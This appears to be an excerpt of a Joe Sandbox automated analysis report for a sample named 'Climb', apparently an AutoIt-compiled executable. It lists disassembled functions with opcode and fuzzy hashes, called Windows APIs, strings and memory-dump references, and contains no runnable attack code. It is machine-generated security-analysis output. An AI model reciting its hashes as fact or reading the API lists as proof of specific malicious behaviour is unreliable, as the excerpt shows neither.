                                                                                                                                                                      • Opcode ID: b8b6efdf3bfc84d813bcab622c42e2d379d24203bd663a6da2216a3d983d064d
                                                                                                                                                                      • Instruction ID: 7486e00c3dd79a389698fb7cb99074e8281b4ee762bb22a15281d1e8f2749abb
                                                                                                                                                                      • Opcode Fuzzy Hash: b8b6efdf3bfc84d813bcab622c42e2d379d24203bd663a6da2216a3d983d064d
                                                                                                                                                                      • Instruction Fuzzy Hash: 77010432A0492F8BCB109EBDEC608BF3BB5FB68355750092AEC2193190EB34D8088690
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620
                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00552699
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                      • Opcode ID: efc9cdd305863f3e130e4f8340d0cb057cccf505f9d8a475af6fed5984d277cf
                                                                                                                                                                      • Instruction ID: 1789b8765d60c4c749eb17436c51448bb391ee940fc272d3ec0f9d6644de925d
                                                                                                                                                                      • Opcode Fuzzy Hash: efc9cdd305863f3e130e4f8340d0cb057cccf505f9d8a475af6fed5984d277cf
                                                                                                                                                                      • Instruction Fuzzy Hash: 27019275640119ABCB04AB64CC65CFE7B64FB87355F10061BAC22972C1DF35580C8791
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620
                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00552593
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                      • Opcode ID: 752d5bb4147a05d72dde60a9e940da4fb1ada848c515bff3f9f5272f22ce5cd2
                                                                                                                                                                      • Instruction ID: 07e5a3a02657b5f0d9bf5076e7022daabd0d71d9a45d685b5b2fce7bf6cbe2c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 752d5bb4147a05d72dde60a9e940da4fb1ada848c515bff3f9f5272f22ce5cd2
                                                                                                                                                                      • Instruction Fuzzy Hash: D10184756401096BCB04E790C976EFE7BA8EF56346F50001B6D02A7281EB149A0C97B1
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620
                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00552615
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                      • Opcode ID: 3813b4342c075329b1cfc49a105d7a318369f9db49f07e9f6fa1c59fe1c2985d
                                                                                                                                                                      • Instruction ID: 8894faa66908a91bf2174b16a38979909b1789c30c31f9e53d5ebc9fe0aacc5c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3813b4342c075329b1cfc49a105d7a318369f9db49f07e9f6fa1c59fe1c2985d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E01A275A4010966CB15E7A0C921EFE7BB8EB16345F50002BBD02A3281EA659E0C9BB6
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620
                                                                                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00552720
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                      • Opcode ID: a58c1e4c872a5175db68aeb7155859916ac4f3efdb355e95c75f6a0b2b716d00
                                                                                                                                                                      • Instruction ID: 5b3fbc925292d3d7dd87a415680d5d6cae38d02efac5456610ae50e0c3b4bbf9
                                                                                                                                                                      • Opcode Fuzzy Hash: a58c1e4c872a5175db68aeb7155859916ac4f3efdb355e95c75f6a0b2b716d00
                                                                                                                                                                      • Instruction Fuzzy Hash: 12F0F475A4021866CB04E3A4CC61FFE7B78FF06355F40091BBC22A32C1DB64580C87A4
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00589B6D
                                                                                                                                                                        • Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00589B53
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$MessageProcSend
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 982171247-3685820393
                                                                                                                                                                      • Opcode ID: 85c491d398b2e69735b2dd1d78c221e14fe184bc6219d681b64a6658828cce23
                                                                                                                                                                      • Instruction ID: f4930640a0e42462b28d7b21d0b9563bb1fa1ad8786f4f8f5ca1944fed6e1f6a
                                                                                                                                                                      • Opcode Fuzzy Hash: 85c491d398b2e69735b2dd1d78c221e14fe184bc6219d681b64a6658828cce23
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01D434104218BFDB25AF14EC44F763FB6FB85366F140569FD022A1E0C7726845EB64
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 2<R$j3Y
                                                                                                                                                                      • API String ID: 0-523750023
                                                                                                                                                                      • Opcode ID: 6b85941435bcb16a1841e8196138fd4cba66de465ea1fac85494fc9eae90b83a
                                                                                                                                                                      • Instruction ID: 53667eca3386fef10f05bdc1f3dd7359b26d37d156dc2c5ae9a5eb3edb40b622
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b85941435bcb16a1841e8196138fd4cba66de465ea1fac85494fc9eae90b83a
                                                                                                                                                                      • Instruction Fuzzy Hash: 72F0F025100118AADB108B90D840AB93BB9EF05700F00447ABC89C72C0FB788F80E365
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00588471
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0058847F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 1378638983-3685820393
                                                                                                                                                                      • Opcode ID: 4137d458c8a305c8c53237acb47e6db3f01340cb2ae0760d63632dd373b14d37
                                                                                                                                                                      • Instruction ID: f067e7512322b52ae13c967dfbd6ab77fa3e7a313558f7ce496fd251f41858b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 4137d458c8a305c8c53237acb47e6db3f01340cb2ae0760d63632dd373b14d37
                                                                                                                                                                      • Instruction Fuzzy Hash: EFF049362012059FCB14EF69DC44D7A7BB5FB9A324B504A2DFA26973F0DB709844EB10
                                                                                                                                                                      APIs
                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0055146F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                      • API String ID: 2030045667-4017498283
                                                                                                                                                                      • Opcode ID: 3c61ec7cc8f77ec01e35b552adb51eaeace2e7fdc0bfcf0e3428c5d35bb36b64
                                                                                                                                                                      • Instruction ID: 7c9cb767f68a6b7d18dac728a1614561f0f7056a48e1070b4e64eb44133b9949
                                                                                                                                                                      • Opcode Fuzzy Hash: 3c61ec7cc8f77ec01e35b552adb51eaeace2e7fdc0bfcf0e3428c5d35bb36b64
                                                                                                                                                                      • Instruction Fuzzy Hash: EBE0D8322C471936E6103794AC07FD57FD5AF04B61F11481FFB88684C24EE624D083AD
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0050FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005110E2,?,?,?,004F100A), ref: 0050FAD9
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,004F100A), ref: 005110E6
                                                                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,004F100A), ref: 005110F5
                                                                                                                                                                      Strings
                                                                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005110F0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                      • API String ID: 55579361-631824599
                                                                                                                                                                      • Opcode ID: b21e2860689945ad4539d1405097d125960ddb5870f7465475f25695e37af10f
                                                                                                                                                                      • Instruction ID: 197f2512bf105aad41fb1d95d25866c5e18bbb0ac3f903ed8add58e6fdc2f964
                                                                                                                                                                      • Opcode Fuzzy Hash: b21e2860689945ad4539d1405097d125960ddb5870f7465475f25695e37af10f
                                                                                                                                                                      • Instruction Fuzzy Hash: 77E06D70600B518FE7309F38E808786BFF4BB14704F008D5DE986C2691DBB8E488CBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0050F151
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                      • String ID: `5\$h5\
                                                                                                                                                                      • API String ID: 1385522511-385243863
                                                                                                                                                                      • Opcode ID: 5439546b9cce790ecb5fcaa09a4496ffb0bd000c66cb7eddc600c8f636ed54ce
                                                                                                                                                                      • Instruction ID: 149a27d459d0cbc29f947ffbfe4900f8c689bafcdf3538f0ee91fefaaba6ad42
                                                                                                                                                                      • Opcode Fuzzy Hash: 5439546b9cce790ecb5fcaa09a4496ffb0bd000c66cb7eddc600c8f636ed54ce
                                                                                                                                                                      • Instruction Fuzzy Hash: 35E0DF71404818CFC720E72CE849ECC3BB1BB49720F108278E102877D1CB342A82EB14
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 005639F0
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00563A05
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                                                                      • String ID: aut
                                                                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                                                                      • Opcode ID: 67193e53a6317cf4ddfed1646272822dfa0baee24c7a99d876fc4375c71301d9
                                                                                                                                                                      • Instruction ID: e224a3f0a8172743f7d2c52482012e58c4196a2b53cba9325ba90536cb050017
                                                                                                                                                                      • Opcode Fuzzy Hash: 67193e53a6317cf4ddfed1646272822dfa0baee24c7a99d876fc4375c71301d9
                                                                                                                                                                      • Instruction Fuzzy Hash: 9ED05B7550031867DA6097549C0DFDB7B7CDB44710F0001917E55A10D1DAB0D549C7A0
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00582E08
                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 00582E0F
                                                                                                                                                                        • Part of subcall function 0055F292: Sleep.KERNEL32 ref: 0055F30A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                      • Opcode ID: 1f549176ac74e3b22e747532a1c8ee66ca85dcb0663d330fdd35b788230bc3e3
                                                                                                                                                                      • Instruction ID: 266016cda3510a49a4317bd8d7e31e5c03ea0112ba1f2f339975551d34464251
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f549176ac74e3b22e747532a1c8ee66ca85dcb0663d330fdd35b788230bc3e3
                                                                                                                                                                      • Instruction Fuzzy Hash: 4ED0A9353813047BE224A330AC0FFC22BA0ABA4B10FA008227A45AA0C0C8A068048B64
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00582DC8
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00582DDB
                                                                                                                                                                        • Part of subcall function 0055F292: Sleep.KERNEL32 ref: 0055F30A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                      • Opcode ID: 16b6224f4bae207315a694e44295554de64cfacb971e02a82a071c35eb669769
                                                                                                                                                                      • Instruction ID: b8fb5ccb40ac1d35435a28e8c799147dea1133b646bc5878d37e5fc1fceff27f
                                                                                                                                                                      • Opcode Fuzzy Hash: 16b6224f4bae207315a694e44295554de64cfacb971e02a82a071c35eb669769
                                                                                                                                                                      • Instruction Fuzzy Hash: 8AD0A939394304B7E224A330AC0FFD22FA0AFA0B10F6008227A49AA0C0C8A068048B60
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0052C213
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0052C221
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0052C27C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                      • Opcode ID: d7d109efdebdc74b8ef3ff6ba8a2b5a8f565def6132c246f6020fa0576e34fa5
                                                                                                                                                                      • Instruction ID: 970440a81a351ef9f45c3b0b44f27faa96df69b858a66c887aeeae5422d670d2
                                                                                                                                                                      • Opcode Fuzzy Hash: d7d109efdebdc74b8ef3ff6ba8a2b5a8f565def6132c246f6020fa0576e34fa5
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A41D734600226EFDB218FE5E844AAE7FA5FF53710F244169E895AB2E2DF309D01C760